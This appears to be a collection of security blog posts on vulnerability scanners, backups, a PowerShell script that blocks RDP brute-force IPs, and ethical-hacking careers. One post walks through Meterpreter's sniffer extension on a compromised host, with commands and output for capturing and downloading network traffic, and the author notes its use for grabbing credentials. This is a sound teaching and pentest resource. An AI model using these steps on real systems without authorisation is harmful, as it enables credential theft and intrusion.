Automated vulnerability scanners provide a lot of false positives reports, this create a lot of work for Security Analyst and some of them hate them. Are Vulnerability scanners broken? 

 

Not necessary, still the automated vulnerability scanners provide a lot of help to identify weakness of the system or OS and it is cheaper compering to a penetration testing.

 

Security is an ongoing process, automated scanner help to increase the security bar of any system but at the same time it shouldn't replace any penetration testing. After you keep running the automated tool you bring a penetration tester. The pentester will focus in the most difficult weakness because you found the easy one with vulnerability scanner.

 

So, Are Vulnerability scanners broken? No, they keep helping to protect the data.

 

How is possible that a lot of companies worked without a good back up? The risk is high. Very often in the moment where you do not expect it you get a hit and then the only solution you have is restore from backup.

 

These are some of examples:

 

1. User is surfing the internet and hit a site that infect his/her machine and the malware is a crypto locker one, terrible, begin to encrypt all the network drives mapped in that computer and some of those malware including encrypt the shadow files. You have two options: restore from backup or pay the ransom.

 

2. This is very common, users showed up at 7:30 a.m. and the accounting or file server is not working, you go and check and discover the hard drive is failing or the whole OS is corrupted including the data, etc, etc. Specially with hardware failed you need to restore from backup.

 

In the previous example what happen if you do not have backup, then prepare your resume, very soon you will begin to look for a job, the company will lose money.

 

Now what happen if you have backup, you are happy, and begin to restore the data or server and discovered the backup is not working right and you cannot restore anything. Nobody never tested the backups.

 

Now we can say Houston we got a problem!!!.

 

I saw others companies who lost data between 30 GBytes to 1 TBytes and they restored the data in a couple of hours, very quickly. Good. Why, because they implemented good backup solution according to their needs.

 

Types of Backups: Image or files.

 

No tall the backups are the same, depend of many factors, if you have servers that needs to restore complex applications then you need backup that create images of the machine. 

 

For the file servers is different, you just need to backup the files or data, so in case the files became corrupted, encrypted or deleted you can restore them very easy including in production time.

 

There are different strategies to protect company data or servers in case of disasters, you know your company and environment, like the people says: Choose wisely.!!!

 

Meterpreter allow you to run packet sniffer with extension, and something very important is that the sniffer is never saved in the target hard drive. I will explaint hwo to enable packet sniffer with Metasploit with Meterpreter:

 

Lets consider you are already connect with any exploit and meterpreter enable, then you type the following:

 

###user sniffer extension

 

meterpreter > use sniffer

 

Loading extension sniffer...success.

 

meterpreter > ?

 

 

....

 

Sniffer Commands

================

 

    Command             Description

    -------             -----------

    sniffer_dump        Retrieve captured packet data to PCAP file

    sniffer_interfaces  Enumerate all sniffable network interfaces

    sniffer_release     Free captured packets on a specific interface instead of downloading them

    sniffer_start       Start packet capture on a specific interface

    sniffer_stats       View statistics of an active capture

    sniffer_stop        Stop packet capture on a specific interface

 
 
### We try to see what interface we will to use to sniff the traffic
 
 
meterpreter > sniffer_interfaces
 
 
1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Realtek PCIe GBE Family Controller' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
 
 
###You can see the interface 2 is the network one, we will start using that interface:
 
meterpreter > sniffer_start 2
 
[*] Capture started on interface 2 (50000 packet buffer)
 
 
### Stop the sniffer
 
meterpreter > sniffer_stop 2
 
[*] Capture stopped on interface 2
[*] There are 3099 packets (1365925 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'
 
 
### Download the data
 
meterpreter > sniffer_dump 2 /root/raul.pcap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 3099 packets (1427905 bytes)
[*] Downloaded 036% (524288/1427905)...
[*] Downloaded 073% (1048576/1427905)...
[*] Downloaded 100% (1427905/1427905)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to /root/raul.pcap
 
 
The I was able to open the file using wireshark raul.pcap
 
Summary
 
Where can you use this? You can use it to grab credentials, move horizontal on the network if you are pentesting a network or if you are troubleshooting any computer problem on the network.
 
 
 
 

Several times you check the Security logs and noticed some IP addresses ate trying to guess any username and password to the remote desktop or RDP.

 

This script is for Windows 2008/2008R2 and Windows 7.

 

Because we want to block and stop those attacks a lot of Security Analyst block the IP address in the Firewall (Windows or Appliance). It is good but there is a  big chance that another IP show up attacking when the analyst is sleeping or doing something else.

 

This script will read the Windows log looking for the Event id 4625 in the last 5 minutes , then will remove the log information and duplicate IP addresses, at the end will write the ip addresses in the firewall to block them. Now this block will be for the whole IP not the port.

 

The next time you run the script it will delete all the IP addresses the script wrote in the firewall and begin the process again.

 

Now if there is not any new IP address to add the scrip will end.

 

This script is basic. So there is not port involved just IP addresses and if a legitit user put wrong password he/she ip will be block it in the next time you runt he script.

 

Now to run the script every 5 minutes you will need to create a task in the Windows machines to run every 5 minutes.

 

If you want to copy the script please copy and past in the Notepad to make sure the code is fine otherwise you will get some errors and will troubleshooting.

 

If you need custom code please contact me and I will be glad to help you for small fee.

 

This is the script:

 

 

#### THIS LINE WILL CLEAN ANE FIREWALL ACCESS LIST WAS CREATED TO BLOCK IP ADDDRESSES USING THIS SCRIPT, I AVE TO PUT IT HERE TO AVOID FILLING UP THE

####FIREWALL WITH LINES AND ELIMINATING THE ONES THAT WE DO NOT NEED TO BLOCK

 

 

netsh advfirewall firewall del rule name="Block IP Attacker"

 

 

 

### This check the latest 5 minutes wrong username and password. If you want to change the time replace the -5 for any minutes you want.

 

 

Get-EventLog -LogName Security -After (Get-Date).AddMinutes(-5) | Where-Object {$_.eventID -eq 4625}| Format-List message | Out-File result.txt

 

 

### This find the IP addresses line

 

 

get-content result.txt | Select-String -Pattern "Source Network Address:" | out-file result2.txt

 

 

###CLEAN THE OUTPUT to eliminate any character and letters from the logs

 

Get-Content result2.txt | ForEach-Object {$_ -replace "Source Network Address:", ""} | ForEach-Object {$_ -replace "-", ""} | out-file result3.txt

 

Get-Content result3.txt | ForEach-Object {$_.trim()} | out-file result4.txt

 

Get-Content result4.txt | where {$_ -ne ""} > result5.txt

 

 

###REMOVING DUPLICATE IP addresses

 

get-content result5.txt | sort| Get-Unique | out-file result6.txt

 

Get-Content result6.txt | where {$_ -ne ""} > iptoblock.txt

 

get-content iptoblock.txt

 

 

 

###CREATING RULES FIREWALL, IF THERE IS NOT ANY ATTACK THE PROGRAM WILL EXIT and will print No New Incidents, I will sleep waiting for new attacks

 

if ((Get-item iptoblock.txt).length -eq 0)

 

{

    write-host "No New Incidents, I will sleep waiting for new attacks"

    Exit

}

 

Else

 

{

 

$c = get-content iptoblock.txt

 

foreach ($ip in $c){

 

    netsh advfirewall firewall add rule name="Block IP Attacker" dir=in interface=any action=block remoteip="$ip"

   

}

 

}

 

 

###This will tell you the scrip finish, you can comment this line

 

write-host "WORK DONE"

 

 

 

 

This is not part of the script.

 

 

 

 

 

A lot of people want to be ethical hacker or penetration testing, it is very rewarded job and also require a lot of effort, I will describe in this article what knowledge you need if you want to be ethical hacker. I will not touch the soft skills only the technical ones.

 

First this is not an easy path, it will require perseverance and a lot of self study including think completely different than any other tech (outside the box). 

 

Basic Knowledge

 

Yes, you need to have basic knowledge and it has to be very solid, you do not have the luxury to have holes in your basic knowledge.

 

Knowledge of Windows/Linux OS, you have to be strong in one of them and very proficient in the second, I am not saying you can create a cluster with those servers, I am saying the same knowledge you should have if you are a System Admin or System Engineer working for an IT company (yes, it is very different working for one company than working for one).

 

Network knowledge, yes, you have to have knowledge how routing works, tcp/udp, packets, routers, switches, arp, firewalls, etc. How will you bypass a firewall if you do not know how it works or sniff traffic if you do not know switches?

 

Programming knowledge, you have to have one language where you are strong and if you are going to web ethical hacker you have have more that one language. A lot of hacker use perl and python.

 

Specialty Knowledge

 

This depend in what you want to be good, you cannot be strong in all the specialty with some exceptions. These are some example

 

Specialty Attacking  Network: For this you need to have a good knowledge of protocols, routers, switches firewalls, wifi,packets, etc. 

 

Specialty Attacking Systems: This include a lot of the networks because you use packets, etc. Plus good knowledge in Windows/Linux and how to escalate on it to be an administrator on the server or domain.

 

Attacking Web Applications: In this you have to have knowledge of different web programming language like ASP, PHP, Java, etc. Also you need to have good databases knowledge, yes, How will you try to do SQL injection when you do not know anything about SQL queries?

 

Conclusion

 

A lot of ethical hackers have a mix of skills, They normally are strong in one specialty and a little weak in the other specialty, In the beginning do not worry what skills you will have, Begin to build your skills and later you will find what of those fields you want to be and go for, Enjoy all the process.